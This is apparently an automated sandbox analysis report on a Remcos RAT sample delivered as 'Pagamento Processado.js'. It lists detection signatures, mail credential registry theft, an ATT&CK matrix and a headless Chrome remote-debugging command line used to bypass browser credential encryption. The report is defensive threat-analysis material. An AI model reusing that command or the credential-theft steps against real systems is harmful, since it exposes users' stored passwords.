Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\recover.exe	Code function: ESMTPPassword	14_2_004033F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	14_2_00402DB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	14_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3fc0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.recover.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.recover.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3fc0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2523575481.0000000003FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1476360497.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: recover.exe PID: 7744, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"

Detected Remcos RAT

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-U6XQL5

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2518531242.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2518531242.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1402730811.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7564, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: cmd.exe

11_2_00405091

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	52 Scripting	Valid Accounts	111 Native API	52 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	22 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	111 Input Capture	11 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Windows Service	1 Extra Window Memory Injection	5 Obfuscated Files or Information	2 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	Login Hook	1 Access Token Manipulation	12 Software Packing	3 Credentials In Files	3 File and Directory Discovery	Distributed Component Object Model	111 Input Capture	2 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	1 Windows Service	1 Timestomp	LSA Secrets	38 System Information Discovery	SSH	3 Clipboard Data	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	522 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	131 Security Software Discovery	VNC	GUI Input Capture	113 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Bypass User Account Control	DCSync	31 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Masquerading	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	31 Virtualization/Sandbox Evasion	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	522 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Pagamento Processado.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Pagamento Processado.js